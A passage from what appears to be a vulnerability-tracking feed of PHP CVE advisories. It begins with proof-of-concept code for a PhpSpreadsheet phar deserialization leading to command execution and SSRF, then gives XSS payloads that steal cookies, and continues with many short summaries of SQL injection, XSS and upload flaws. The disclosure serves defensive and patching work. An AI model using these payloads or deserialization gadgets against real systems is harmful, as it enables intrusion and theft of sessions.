<?php require 'vendor/autoload.php'; use PhpOffice\PhpSpreadsheet\IOFactory; class GadgetClass { public $data; function __construct($d) { $this->data = $d; } function __destruct() { shell_exec($this->data); } } $filename = $argv[1] ?? null; if (!$filename) { echo "Usage: php test.php <path>\n"; echo " e.g. php test.php phar://exploit.xlsx/whatever\n"; exit(1); } echo "Calling IOFactory::load('" . $filename . "')\n"; try { $spreadsheet = IOFactory::load($filename); var_dump($spreadsheet); } catch (Throwable $e) { echo "Vuln has still triggered even if exception triggers.\n"; } ``` ### RCE Run the PoC (for RCE): ```bash php -c php.ini make_phar.php && php test.php phar://exploit.xlsx/test; ls -lah /tmp/poc.txt ``` The file `/tmp/poc.txt` should now be present on disk. > Note: the vuln still triggers if the file pointed to inside the phar does not exist/is not supported (html, xlsx, etc...). This means an attacker could "silently" trigger the vuln without leaving any error logs if the file inside the phar exists and is supported instead. ### SSRF Run the PoC (for SSRF): ```bash ncat -lvp 21 #run on another terminal php test.php ftp://127.0.0.1:21/test ``` Observe a connection is made to `127.0.0.1` on port `21`. ## Root Cause Analysis Following the API exposed by the library, using `IOFactory::load`, the code proceeds as follows: ```php IOFactory::load($filename) -> IReader::load($filename, $flags) -> IReader::loadSpreadsheetFromFile($filename) -> File::assertFile($filename, ...) -> is_file($filename); ``` The one obvious gadget that was found is guarded via `__unserialize` (or `__wakeup` in older versions) in the `XMLWriter` class, making it not possible to use the phar deserialization as a standalone attack vector using just this library - it is still viable to create "POP" gadget chains via other classes which may be available in real-world deployment scenarios. ```php public function __destruct() { // Unlink temporary files // There is nothing reasonable to do if unlink fails. if ($this->tempFileName != '') { @unlink($this->tempFileName); } } /** @param mixed[] $data */ public function __unserialize(array $data): void { $this->tempFileName = ''; throw new SpreadsheetException('Unserialize not permitted'); } ``` Phpspreadsheet is used as a backbone for many library wrappers, including very widespread ones from [packagist ](https://packagist.org)like `maatwebsite/excel` for Laravel, `sonata-project/exporter` and so on, hence the deserialization vector stays relevant in other contexts. ## Suggested mitigations Use `is_file` only after making sure the filename does not contain any php wrapper: ```php $scheme = parse_url($filename, PHP_URL_SCHEME); // strlen check > 1 to avoid issues with Windows absolute paths (e.g. C:\...), Windows quirks :) // since no built-in or commonly registered PHP stream wrapper uses a single-character scheme, this should be ok, to my knowledge if ($scheme !== null && strlen($scheme) > 1) { throw new \PhpOffice\PhpSpreadsheet\Exception( "Stream wrappers are not permitted as file paths: {$filename}" ); } ``` or perhaps even just passing it to `realpath` before calling `is_file` to ensure it is parsed correctly: ```php $real = realpath($filename); // not php wrapper aware AFAIK if ($real === false) { throw new \PhpOffice\PhpSpreadsheet\Exception("Invalid file path: {$filename}"); } // from here on, $real should be a clean absolute path so we can pass it to is_file() if (!is_file($real)) { throw new ... } ``` > Note: `stream_is_local()` would also not be safe here - as it considers `phar://` to be local and would not block it.

PHP Microsoft SSRF Deserialization
NVD GitHub VulDB
CVSS 4.0
9.2
EPSS
0.1%
CVE-2026-34965 HIGH POC This Week

Cockpit CMS contains an authenticated remote code execution vulnerability in the /cockpit/collections/save_collection endpoint that allows authenticated attackers with collection management privileges to inject arbitrary PHP code into collection rules parameters. Attackers can inject malicious PHP code through rule parameters which is written directly to server-side PHP files and executed via include() to achieve arbitrary command execution on the underlying server.

PHP Code Injection RCE
NVD GitHub
CVSS 4.0
8.7
EPSS
0.4%
CVE-2018-25300 HIGH POC This Week

XATABoost CMS 1.0.0 contains a union-based SQL injection vulnerability that allows unauthenticated attackers to manipulate database queries by injecting SQL code through the id parameter. Rated high severity (CVSS 8.8), this vulnerability is remotely exploitable, no authentication required, low attack complexity. Public exploit code available and no vendor patch available.

SQLi PHP
NVD Exploit-DB
CVSS 4.0
8.8
EPSS
0.1%
CVE-2026-7401 LOW POC Monitor

A vulnerability was detected in SourceCodester CET Automated Grading System with AI Predictive Analytics 1.0. This vulnerability affects unknown code of the file /index.php?action=register of the component Registration. The manipulation of the argument student_id/full_name/section/username results in cross site scripting. The attack can be launched remotely. The exploit is now public and may be used.

PHP XSS
NVD VulDB GitHub
CVSS 4.0
2.1
EPSS
0.0%
CVE-2026-7394 LOW POC Monitor

A vulnerability was determined in SourceCodester Pizzafy Ecommerce System 1.0. Affected by this vulnerability is an unknown functionality of the file /admin/view_order.php of the component GET Parameter Handler. Executing a manipulation of the argument ID can lead to sql injection. The attack may be performed from remote. The exploit has been publicly disclosed and may be utilized.

PHP SQLi
NVD VulDB GitHub
CVSS 4.0
2.0
EPSS
0.0%
CVE-2026-7393 LOW POC Monitor

A vulnerability was found in SourceCodester Pizzafy Ecommerce System 1.0. Affected is the function save_menu of the file /admin/admin_class_novo.php of the component File Extension Handler. Performing a manipulation of the argument img results in unrestricted upload. The attack is possible to be carried out remotely. The exploit has been made public and could be used.

PHP File Upload
NVD VulDB GitHub
CVSS 4.0
2.0
EPSS
0.0%
CVE-2026-7392 LOW POC Monitor

A vulnerability has been found in SourceCodester Pharmacy Sales and Inventory System 1.0. This impacts the function delete_supplier of the file /ajax.php?action=delete_supplier. Such manipulation of the argument ID leads to sql injection. The attack can be executed remotely. The exploit has been disclosed to the public and may be used.

PHP SQLi
NVD VulDB GitHub
CVSS 4.0
2.1
EPSS
0.0%
CVE-2026-7390 LOW Monitor

A vulnerability was detected in SourceCodester Pharmacy Sales and Inventory System 1.0. The impacted element is the function Customer of the file /index.php?page=customer. The manipulation of the argument Name results in cross site scripting. The attack may be launched remotely. The exploit is now public and may be used.

PHP XSS
NVD GitHub VulDB
CVSS 4.0
2.0
EPSS
0.0%
CVE-2026-7389 MEDIUM This Month

A security vulnerability has been detected in EyouCMS up to 1.7.9. The affected element is the function GetSortData of the file application/common.php. The manipulation of the argument sort_asc leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed publicly and may be used. The project was informed of the problem early through an issue report but has not responded yet.

PHP SQLi
NVD VulDB
CVSS 4.0
5.5
EPSS
0.0%
CVE-2026-7391 LOW POC Monitor

A flaw has been found in SourceCodester Pharmacy Sales and Inventory System 1.0. This affects the function save_supplier of the file /ajax.php?action=save_supplier. This manipulation of the argument ID causes sql injection. Remote exploitation of the attack is possible. The exploit has been published and may be used.

PHP SQLi
NVD VulDB GitHub
CVSS 4.0
2.1
EPSS
0.0%
CVE-2026-7388 LOW POC Monitor

A weakness has been identified in EyouCMS up to 1.7.9. Impacted is the function editFile of the file application/admin/logic/FilemanagerLogic.php of the component Template File Handler. Executing a manipulation can lead to code injection. The attack can be launched remotely. The exploit has been made available to the public and could be used for attacks. The project was informed of the problem early through an issue report but has not responded yet.

PHP Code Injection RCE
NVD VulDB
CVSS 4.0
2.0
EPSS
0.0%
CVE-2026-38991 PHP HIGH PATCH GHSA This Week

Remote code execution in Cockpit CMS 2.13.5 and earlier allows authenticated users with low privileges to execute arbitrary PHP code on the server. Attackers exploit a filter bypass in the Bucket component's _isFileTypeAllowed function by crafting filenames that evade extension validation, then renaming files to .php for execution. Public proof-of-concept exists (SSVC: poc). EPSS data unavailable, but CVSS 8.8 with network vector and low attack complexity indicates high exploitability once authenticated.

PHP RCE File Upload
NVD GitHub VulDB
CVSS 3.1
8.8
EPSS
0.0%
CVE-2026-40296 PHP MEDIUM PATCH GHSA This Month

It was discovered that there is a way to bypass HTML escaping in the HTML writer using custom number format codes. ## The Problem In `Writer/Html.php` around line 1592, the code checks if the formatted cell data equals the original data to decide whether to apply `htmlspecialchars()`: ```php if ($cellData === $origData) { $cellData = htmlspecialchars($cellData, ...); } ``` When a cell has a custom number format containing `@` (text placeholder) with any additional literal characters, the formatter replaces `@` with the cell value and adds the extra characters. This makes `$cellData !== $origData`, so `htmlspecialchars()` is **skipped entirely**. Even a single trailing space in the format (`@ `) is enough to bypass the escape. ## Proof of Concept ```php use PhpOffice\PhpSpreadsheet\Spreadsheet; use PhpOffice\PhpSpreadsheet\Writer\Html; use PhpOffice\PhpSpreadsheet\Cell\DataType; $spreadsheet = new Spreadsheet(); $sheet = $spreadsheet->getActiveSheet(); // XSS payload with malicious number format $sheet->setCellValueExplicit('A1', '<img src=x onerror=alert(document.cookie)>', DataType::TYPE_STRING); $sheet->getStyle('A1')->getNumberFormat()->setFormatCode('. @'); $writer = new Html($spreadsheet); $writer->save('output.html'); ``` The generated HTML contains: ```html <td>. <img src=x onerror=alert(document.cookie)></td> ``` The XSS payload is **completely unescaped**. ## Tested Bypass Formats | Format Code | Result | Escaped? | |---|---|---| | `General` (default) | Original value | YES (safe) | | `. @` | `. ` + value | **NO (XSS!)** | | `@ ` (trailing space) | value + ` ` | **NO (XSS!)** | | `x@` | `x` + value | **NO (XSS!)** | This was tested with PhpSpreadsheet 4.5.0 and confirmed the XSS executes in the browser. ## Impact Any application that: 1. Accepts uploaded XLSX files from users 2. Converts them to HTML using PhpSpreadsheet's HTML writer 3. Displays the HTML to other users ...is vulnerable to stored XSS. The attacker embeds the payload in a cell value and sets a custom number format in the XLSX file's `xl/styles.xml`. ## Suggested Fix Always apply `htmlspecialchars()` regardless of whether formatting changed the value: ```php // Instead of conditional escaping: $cellData = htmlspecialchars($cellData, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8'); ``` Or escape AFTER formatting, not conditionally based on equality. ## Reporter Keyvan Hardani

PHP XSS
NVD GitHub
CVSS 3.1
5.4
EPSS
0.0%
CVE-2026-35453 PHP MEDIUM PATCH GHSA This Month

### Summary The HTML Writer in PhpSpreadsheet bypasses `htmlspecialchars()` output escaping when a cell uses a custom number format containing the `@` text placeholder with additional literal text (e.g., `@ "items"` or `"Total: "@`). This allows an attacker to inject arbitrary HTML and JavaScript into the generated HTML output by crafting a malicious XLSX file. ### Details #### 1. Conditional escaping in `Html.php:1586-1594` ```php $cellData = NumberFormat::toFormattedString( $origData2, $formatCode ?? NumberFormat::FORMAT_GENERAL, [$this, 'formatColor'] ); if ($cellData === $origData) { $cellData = htmlspecialchars($cellData, Settings::htmlEntityFlags()); } ``` `htmlspecialchars()` is only called when `$cellData === $origData` (strict comparison). If the formatted output differs from the original value in any way, escaping is skipped entirely. #### 2. Early return in `Formatter.php:136-152` ```php if (preg_match(self::SECTION_SPLIT, $format) === 0 && preg_match(self::SYMBOL_AT, $formatx) === 1) { if (!str_contains($format, '"')) { return str_replace('@', /* raw value */, $format); } return str_replace(/* ... preg_replace with raw value ... */); } ``` When the format code contains `@` with additional literal text (e.g., `@ "items"`), the formatter substitutes the raw cell value into the format string and **returns early** - the `formatColor` callback (which would have applied `htmlspecialchars`) is never invoked. ### PoC **test.php** ``` php <?php require '/app/vendor/autoload.php'; use PhpOffice\PhpSpreadsheet\Spreadsheet; use PhpOffice\PhpSpreadsheet\Writer\Html; $spreadsheet = new Spreadsheet(); $sheet = $spreadsheet->getActiveSheet(); $payload = '<img src=x onerror=alert(document.domain)>'; $formatCode = '@ "items"'; $sheet->setCellValue('A1', $payload); $sheet->getStyle('A1')->getNumberFormat()->setFormatCode($formatCode); $writer = new Html($spreadsheet); $html = $writer->generateHTMLAll(); file_put_contents('/app/output.html', $html); echo "HTML output saved to /app/output.html\n"; ``` The produced output contains unescaped data. ``` html <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="generator" content="PhpSpreadsheet, https://github.com/PHPOffice/PhpSpreadsheet" /> <title>Untitled Spreadsheet</title> <meta name="author" content="Unknown Creator" /> <meta name="title" content="Untitled Spreadsheet" /> <meta name="lastModifiedBy" content="Unknown Creator" /> <meta name="created" content="2026-04-02T16:34:44+00:00" /> <meta name="modified" content="2026-04-02T16:34:44+00:00" /> <style type="text/css"> [..SNIP..] </style> </head> <body> <div style='page: page0'> <table border='0' cellpadding='0' cellspacing='0' id='sheet0' class='sheet0 gridlines'> <col class="col0" /> <tbody> <tr class="row0"> <td class="column0 style1 s"><img src=x onerror=alert(document.domain)> items</td> </tr> </tbody></table> </div> </body> </html> ``` <img width="719" height="716" alt="Screenshot 2026-04-02 at 18 45 53" src="https://github.com/user-attachments/assets/b758b063-a2d1-4e76-87bb-931eae81dbfe" /> ### Impact The impact changes based on the way the HTML is served. In case it is served from the web server it is typical XSS, in case the file is downloaded and opened locally, the attack vector is more limited.

PHP XSS
NVD GitHub VulDB
CVSS 4.0
4.8
EPSS
0.0%
CVE-2026-7317 PHP LOW PATCH Monitor

A vulnerability was found in Grav CMS up to 1.7.49.5/2.0.0-beta.1. Affected by this vulnerability is the function FileCache::doGet of the file system/src/Grav/Framework/Cache/Adapter/FileCache.php of the component Cache Value Handler. The manipulation results in deserialization. The attack may be launched remotely. The attack requires a high level of complexity. The exploitation appears to be difficult. The exploit has been made public and could be used. Upgrading to version 2.0.0-beta.2 addresses this issue. The patch is identified as c66dfeb5f. The affected component should be upgraded.

PHP Deserialization
NVD GitHub VulDB
CVSS 4.0
1.3
EPSS
0.1%
CVE-2026-7297 LOW Monitor

A vulnerability was determined in SourceCodester Pizzafy Ecommerce System 1.0. This vulnerability affects the function save_user of the file /admin/ajax.php?action=save_user. Executing a manipulation of the argument Name can lead to cross site scripting. The attack can be executed remotely. The exploit has been publicly disclosed and may be utilized.

PHP XSS
NVD GitHub VulDB
CVSS 4.0
1.9
EPSS
0.0%
CVE-2026-7296 LOW Monitor

A vulnerability was found in SourceCodester Pizzafy Ecommerce System 1.0. This affects the function save_order of the file /admin/ajax.php?action=save_order. Performing a manipulation of the argument first_name results in cross site scripting. Remote exploitation of the attack is possible. The exploit has been made public and could be used.

PHP XSS
NVD GitHub VulDB
CVSS 4.0
1.9
EPSS
0.0%
CVE-2026-37750 MEDIUM This Month

A reflected Cross-Site Scripting (XSS) vulnerability in School Management System by mahmoudai1 allows unauthenticated remote attackers to execute arbitrary JavaScript in victim's browsers via the unsanitized type parameter in register.php.

PHP XSS
NVD GitHub
CVSS 3.1
6.1
EPSS
0.0%
CVE-2026-7295 LOW POC Monitor

A vulnerability has been found in SourceCodester Pizzafy Ecommerce System 1.0. Affected by this issue is the function save_menu of the file /admin/ajax.php?action=save_menu. Such manipulation of the argument Name leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.

PHP XSS
NVD VulDB GitHub
CVSS 4.0
1.9
EPSS
0.0%
CVE-2026-7294 LOW POC Monitor

Cross-site scripting (XSS) in SourceCodester Pizzafy Ecommerce System 1.0 allows authenticated high-privilege administrators to inject malicious scripts via the Name parameter in the /admin/index.php?page=save_settings endpoint, exploited when an admin visits a crafted link. The vulnerability requires high privilege level (admin) and user interaction (UI:P), limiting but not eliminating real-world risk in environments with untrusted admins or admin account compromise. Publicly available exploit code exists.

PHP XSS
NVD VulDB GitHub
CVSS 4.0
1.9
EPSS
0.0%
CVE-2026-7293 LOW POC Monitor

SQL injection in SourceCodester Pizzafy Ecommerce System 1.0 allows authenticated remote attackers to execute arbitrary SQL commands via the ID parameter in the delete_category function (/admin/ajax.php?action=delete_category). The vulnerability requires high-privilege authentication but enables limited confidentiality and integrity impact. Publicly available exploit code exists, elevating real-world risk despite the moderate CVSS score of 5.1.

PHP SQLi
NVD VulDB GitHub
CVSS 4.0
2.0
EPSS
0.0%
CVE-2026-7283 LOW Monitor

SQL injection in SourceCodester Pharmacy Sales and Inventory System 1.0 allows authenticated remote attackers to execute arbitrary SQL commands via the ID parameter in the save_expired function of /ajax.php. The vulnerability affects an administrative interface endpoint and has publicly available exploit code. CVSS 5.1 reflects low confidentiality, integrity, and availability impact despite network accessibility due to high-privilege requirement (PR:H).

PHP SQLi
NVD GitHub VulDB
CVSS 4.0
2.0
EPSS
0.0%
CVE-2026-27760 CRITICAL POC PATCH Act Now

Remote code execution in OpenCATS installer allows unauthenticated attackers to inject and execute arbitrary PHP code by manipulating the AJAX endpoint's databaseConnectivity action parameter. The injected code persists in config.php and executes on every page load while the installation wizard remains incomplete. Publicly available exploit code demonstrates breakout from define() string context using quote and statement separator techniques. Patch available via GitHub commit 3002a29, though CVSS AC:H (high complexity) suggests exploitation requires specific timing or environmental conditions during installation phase.

PHP Code Injection RCE Opencats
NVD GitHub VulDB
CVSS 4.0
9.2
EPSS
0.1%
CVE-2026-7282 LOW POC Monitor

SQL injection in SourceCodester Pharmacy Sales and Inventory System 1.0 allows authenticated high-privilege attackers to manipulate the ID parameter in the delete_expired function via /ajax.php?action=delete_expired, enabling remote database query manipulation with confidentiality, integrity, and availability impact. Publicly available exploit code exists and the vulnerability has been documented by VulDB.

PHP SQLi
NVD VulDB GitHub
CVSS 4.0
2.0
EPSS
0.0%
CVE-2026-7269 LOW Monitor

Reflected cross-site scripting in SourceCodester Pharmacy Sales and Inventory System 1.0 allows authenticated remote attackers to inject malicious scripts via the ID parameter in /index.php?page=product, requiring user interaction to trigger payload execution. CVSS 4.8 with public exploit code availability (E:P) indicates low immediate risk despite network accessibility, constrained by high privilege requirement (PR:H) and user interaction dependency (UI:P).

PHP XSS
NVD GitHub VulDB
CVSS 4.0
1.9
EPSS
0.0%
CVE-2026-7281 LOW POC Monitor

Stored cross-site scripting (XSS) in SourceCodester Pharmacy Sales and Inventory System 1.0 allows authenticated remote attackers with high privileges to inject malicious scripts via the Name parameter in the supplier management function (/index.php?page=supplier), affecting users who view the poisoned supplier records. The vulnerability requires user interaction (clicking a malicious link) and has CVSS 4.8 with publicly available proof-of-concept code, though it is limited to high-privileged users (PR:H) and causes only integrity impact (VI:L) without confidentiality or availability compromise.

PHP XSS
NVD VulDB GitHub
CVSS 4.0
1.9
EPSS
0.0%
CVE-2026-7268 LOW POC Monitor

SQL injection in SourceCodester Pizzafy Ecommerce System 1.0 allows authenticated remote attackers to execute arbitrary SQL queries via the Name parameter in the save_category function at /admin/ajax.php. The vulnerability requires valid administrative credentials but poses moderate confidentiality, integrity, and availability risk. Publicly available exploit code exists and EPSS score of 0.84 indicates high exploitation probability despite the authentication gate.

PHP SQLi
NVD VulDB GitHub
CVSS 4.0
2.1
EPSS
0.0%
CVE-2026-7267 LOW POC Monitor

SQL injection in SourceCodester Pizzafy Ecommerce System 1.0 via the ID parameter in /view_prod.php allows authenticated remote attackers to execute arbitrary SQL queries with low complexity and no user interaction required. The vulnerability has a publicly available exploit and CVSS score of 6.3 reflecting moderate impact on confidentiality, integrity, and availability. Active exploitation is not yet confirmed in CISA KEV, but public proof-of-concept code exists.

PHP SQLi
NVD VulDB GitHub
CVSS 4.0
2.1
EPSS
0.0%
CVE-2026-7266 LOW POC Monitor

SQL injection in SourceCodester Pizzafy Ecommerce System 1.0 allows authenticated remote attackers to execute arbitrary SQL queries via the ID parameter in the save_order function at /admin/ajax.php?action=save_order, potentially enabling data exfiltration, modification, or deletion. Publicly available exploit code exists and the vulnerability carries a CVSS score of 6.3 with low complexity, indicating moderate real-world risk despite requiring login credentials.

PHP SQLi
NVD VulDB GitHub
CVSS 4.0
2.1
EPSS
0.0%
CVE-2026-7265 LOW POC Monitor

SQL injection in SourceCodester Pizzafy Ecommerce System 1.0 allows authenticated remote attackers to read, modify, or delete database contents through the ID parameter in the category function (pizza/index.php?page=category). The vulnerability has publicly available exploit code and requires valid user authentication to exploit, making it a moderate-risk issue suitable for immediate patching in production environments.

PHP SQLi
NVD VulDB GitHub
CVSS 4.0
2.1
EPSS
0.0%
CVE-2026-7264 LOW POC Monitor

SQL injection in SourceCodester Pizzafy Ecommerce System 1.0 allows authenticated remote attackers to manipulate the ID parameter in the get_cart_items AJAX function (/admin/ajax.php?action=get_cart_items) to execute arbitrary SQL queries and extract, modify, or delete database contents. The vulnerability has a CVSS score of 6.3 with publicly available exploit code, posing moderate risk to affected installations.

PHP SQLi
NVD VulDB GitHub
CVSS 4.0
2.1
EPSS
0.0%
CVE-2026-7238 LOW POC Monitor

Unrestricted file upload vulnerability in code-projects Online Music Site 1.0 allows authenticated high-privilege administrators to upload arbitrary files via the txtimage parameter in AdminUpdateAlbum.php, potentially leading to remote code execution. The vulnerability is network-accessible, has publicly available exploit code, and requires high-level administrative credentials to exploit, limiting attack surface primarily to insider threats or compromised admin accounts.

PHP File Upload
NVD VulDB GitHub
CVSS 4.0
2.0
EPSS
0.0%
CVE-2026-4911 MEDIUM This Month

Booking Package plugin for WordPress up to version 1.7.06 allows unauthenticated attackers to manipulate booking prices via the intentForStripe() function, which accepts unsanitized $_POST['amount'] values and passes them directly to the Stripe PaymentIntent API without validation. The vulnerability is compounded by commented-out code in CreditCard.php that would normally enforce server-calculated pricing, enabling attackers to complete bookings at arbitrary prices (e.g., $0.01 instead of $500.00) with no authentication required. This is a confirmed price manipulation vulnerability with no active KEV exploitation reported but represents significant financial fraud risk.

PHP WordPress RCE
NVD
CVSS 3.1
5.3
EPSS
0.0%
CVE-2026-7229 LOW POC Monitor

SQL injection in code-projects Coaching Management System 1.0 allows authenticated remote attackers to manipulate the complaintreply parameter in the POST handler at /cims/modules/admin/reply.php, leading to unauthorized database access and potential data exfiltration or modification. CVSS score of 6.3 reflects low confidentiality, integrity, and availability impact with network vector and low attack complexity. Public exploit code is available, and the vulnerability requires valid user authentication to trigger.

PHP SQLi
NVD VulDB GitHub
CVSS 4.0
2.1
EPSS
0.0%
CVE-2026-7228 MEDIUM POC This Month

SQL injection in Pizzafy Ecommerce System 1.0 allows remote unauthenticated attackers to execute arbitrary SQL commands via the ID parameter in the get_cart_count function at /admin/ajax.php. CVSS scores 7.3 (High) with network attack vector, low complexity, and no authentication required. Public exploit code exists on GitHub, significantly lowering the barrier to exploitation. EPSS data not available, but the combination of public exploit, low attack complexity (AC:L), and no authentication (PR:N) indicates moderate-to-high real-world risk for internet-facing installations.

PHP SQLi
NVD VulDB GitHub
CVSS 4.0
5.5
EPSS
0.0%
CVE-2026-7227 MEDIUM POC This Month

SQL injection in Pizzafy Ecommerce System 1.0 allows remote unauthenticated attackers to compromise database confidentiality, integrity, and availability via the email parameter in the admin login function. The vulnerability exists in /admin/ajax.php?action=login and has a publicly available proof-of-concept exploit on GitHub. With CVSS 7.3 (High) and confirmed POC, this represents an immediate risk to internet-exposed admin panels, though no active exploitation has been confirmed by CISA KEV at time of analysis.

PHP SQLi
NVD VulDB GitHub
CVSS 4.0
5.5
EPSS
0.0%
CVE-2026-7226 MEDIUM POC This Month

SQL injection in SourceCodester Pizzafy Ecommerce System 1.0 allows remote unauthenticated attackers to compromise database confidentiality, integrity, and availability through the login2 function. The vulnerability exists in /admin/ajax.php when processing the email parameter during administrative login, enabling attackers to bypass authentication, extract sensitive data, modify records, or disrupt service. A proof-of-concept exploit has been publicly released on GitHub, significantly lowering the barrier to exploitation. CVSS 7.3 (High) reflects network-accessible attack surface with no authentication required and low attack complexity.

PHP SQLi
NVD VulDB GitHub
CVSS 4.0
5.5
EPSS
0.0%
CVE-2026-7225 MEDIUM POC This Month

SQL injection in SourceCodester Pizzafy Ecommerce System 1.0 allows remote unauthenticated attackers to execute arbitrary SQL commands via the ID parameter in the delete_menu function of /admin/ajax.php. Public exploit code is available on GitHub, enabling database extraction, authentication bypass, and potential administrative access. CVSS 7.3 reflects network-accessible attack with no authentication required, though actual exploitation targets the administrative backend endpoint.

PHP SQLi
NVD VulDB GitHub
CVSS 4.0
5.5
EPSS
0.0%
CVE-2026-7224 MEDIUM POC This Month

SQL injection in SourceCodester Pizzafy Ecommerce System 1.0 allows unauthenticated remote attackers to extract, modify, or delete database contents via the ID parameter in /admin/ajax.php?action=delete_cart endpoint. Publicly available exploit code exists (GitHub POC), enabling immediate weaponization. CVSS 7.3 indicates network-based exploitation with no authentication barriers, granting partial confidentiality, integrity, and availability impact. Despite high CVSS and public POC, this affects a niche open-source e-commerce platform with limited deployment footprint.

PHP SQLi
NVD VulDB GitHub
CVSS 4.0
5.5
EPSS
0.0%
CVE-2026-7222 LOW POC Monitor

Stored cross-site scripting (XSS) in code-projects Coaching Management System 1.0 allows authenticated remote attackers to inject malicious scripts via the Complaint parameter in the complaint form page (/cims/modules/student/complaint.php), affecting users who view injected content. CVSS 5.1 reflects low confidentiality impact and limited integrity impact requiring user interaction; publicly available exploit code exists, confirming practical exploitability.

PHP XSS
NVD VulDB GitHub
CVSS 4.0
2.0
EPSS
0.0%
CVE-2026-7200 LOW Monitor

Reflected cross-site scripting (XSS) in SourceCodester Pharmacy Sales and Inventory System 1.0 allows remote attackers to inject malicious scripts via manipulation of the ID parameter in the /index.php?page=types endpoint. User interaction is required for exploitation, and publicly available exploit code exists, though the vulnerability carries limited impact (integrity only, no confidentiality or availability compromise) with a CVSS score of 5.3.

PHP XSS
NVD GitHub VulDB
CVSS 4.0
2.1
EPSS
0.0%
CVE-2026-7199 MEDIUM POC This Month

SQL injection in SourceCodester Pharmacy Sales and Inventory System 1.0 allows remote unauthenticated attackers to execute arbitrary database queries via the ID parameter in /ajax.php?action=delete_product. Publicly available exploit code exists (GitHub POC), enabling unauthorized data access, modification, or deletion without authentication. EPSS data not available, but the combination of network attack vector, no authentication requirement, and public exploit significantly elevates real-world exploitation risk for internet-exposed instances.

PHP SQLi
NVD VulDB GitHub
CVSS 4.0
5.5
EPSS
0.0%
CVE-2026-7194 MEDIUM POC This Month

A weakness has been identified in SourceCodester Pharmacy Sales and Inventory System 1.0. This impacts an unknown function of the file /ajax.php?action=save_product. This manipulation of the argument ID causes sql injection. The attack is possible to be carried out remotely. The exploit has been made available to the public and could be used for attacks.

PHP SQLi
NVD VulDB GitHub
CVSS 4.0
5.5
EPSS
0.0%
CVE-2026-7145 MEDIUM This Month

A weakness has been identified in mettle sendportal up to 3.0.1. Affected is the function destroy of the file app/Http/Controllers/Workspaces/WorkspaceInvitationsController.php of the component Invitation Handler. This manipulation of the argument invitation causes authorization bypass. The attack may be initiated remotely. The project was informed of the problem early through an issue report but has not responded yet.

PHP Authentication Bypass
NVD VulDB GitHub
CVSS 4.0
5.3
EPSS
0.0%
CVE-2026-7144 LOW POC Monitor

A security flaw has been discovered in 1000 Projects Portfolio Management System MCA 1.0. This impacts an unknown function of the file update_passwd_process.php. The manipulation of the argument temp_user results in authorization bypass. The attack can be launched remotely. The exploit has been released to the public and may be used for attacks.

PHP Authentication Bypass
NVD VulDB GitHub
CVSS 4.0
2.1
EPSS
0.0%
CVE-2026-38936 MEDIUM This Month

A reflected cross-site scripting (XSS) vulnerability exists in diskover-community <= 2.3.5 in public/selectindices.php via the namecontains parameter

PHP XSS
NVD GitHub
CVSS 3.1
6.1
EPSS
0.0%
CVE-2026-38935 MEDIUM This Month

A reflected cross-site scripting (XSS) vulnerability exists in diskover-community <= 2.3.5 in public/view.php via the doctype parameter

PHP XSS
NVD GitHub
CVSS 3.1
6.1
EPSS
0.0%
CVE-2026-38934 HIGH This Week

Cross Site Request Forgery vulnerability in diskoverdata diskover-community v.2.3.5. and before allows a remote attacker to escalate privileges and obtain sensitive information via the public/settings_process.php

PHP CSRF
NVD GitHub
CVSS 3.1
8.8
EPSS
0.0%
CVE-2026-7143 LOW POC Monitor

A vulnerability was identified in 1000 Projects Portfolio Management System MCA up to 1.0. This affects an unknown function of the file /admin/block_status.php. The manipulation of the argument q leads to sql injection. The attack can be initiated remotely. The exploit is publicly available and might be used.

PHP SQLi
NVD VulDB GitHub
CVSS 4.0
2.1
EPSS
0.0%
CVE-2026-41466 MEDIUM POC This Month

ProjeQtor versions 7.0 through 12.4.3 contain a stored cross-site scripting vulnerability in the checkValidHtmlText() function within Security.php that fails to properly sanitize user input by only detecting specific patterns while returning unsanitized strings without output encoding. Attackers can inject malicious payloads that bypass the filter using alternative syntax such as img tags with event handlers, which are stored and executed in the browsers of users viewing the affected content.

PHP XSS
NVD
CVSS 4.0
5.1
EPSS
0.0%
CVE-2026-41465 HIGH POC This Week

ProjeQtor versions 7.0 through 12.4.3 contains a path traversal vulnerability in the log file viewer at dynamicDialog.php where the logname parameter is not validated against directory traversal sequences before constructing file paths. Authenticated attackers can inject directory traversal sequences ../ into the logname parameter to read arbitrary .log files accessible to the web server process on the filesystem.

PHP Path Traversal
NVD
CVSS 4.0
7.1
EPSS
0.2%
CVE-2026-41464 HIGH POC This Week

ProjeQtor versions 7.0 through 12.4.3 contain a missing authorization vulnerability in the objectDetail.php endpoint that allows authenticated users with guest-level privileges to retrieve sensitive data belonging to other users including password hashes and API keys. Attackers can bypass access controls by directly accessing the endpoint without ownership or role-based validation to extract administrator credentials and perform privilege escalation.

PHP Information Disclosure Authentication Bypass Privilege Escalation
NVD
CVSS 4.0
7.1
EPSS
0.1%
CVE-2026-41463 HIGH POC This Week

ProjeQtor versions 7.0 through 12.4.3 contain a ZipSlip path traversal vulnerability in the plugin upload functionality that allows authenticated attackers with upload permissions to write files outside the intended extraction directory by crafting ZIP archives with directory traversal sequences. Attackers can exploit unvalidated archive extraction to write a PHP webshell to a web-accessible directory and achieve remote code execution with the privileges of the web server process.

RCE PHP Path Traversal
NVD
CVSS 4.0
8.7
EPSS
0.4%
CVE-2026-7134 LOW POC Monitor

A vulnerability was identified in code-projects Online Lot Reservation System 1.0. Affected is an unknown function of the file /edithousepic.php. Such manipulation of the argument image leads to unrestricted upload. The attack can be launched remotely. The exploit is publicly available and might be used.

PHP File Upload
NVD VulDB GitHub
CVSS 4.0
2.0
EPSS
0.0%
CVE-2026-7133 LOW POC Monitor

A vulnerability was determined in code-projects Online Lot Reservation System 1.0. This impacts an unknown function of the file /activity.php. This manipulation of the argument directory causes unrestricted upload. The attack can be initiated remotely. The exploit has been publicly disclosed and may be utilized.

PHP File Upload
NVD VulDB GitHub
CVSS 4.0
2.0
EPSS
0.0%
CVE-2026-7132 MEDIUM POC This Month

A vulnerability was found in code-projects Online Lot Reservation System up to 1.0. This affects the function readfile of the file /download.php. The manipulation of the argument File results in path traversal. It is possible to launch the attack remotely. The exploit has been made public and could be used.

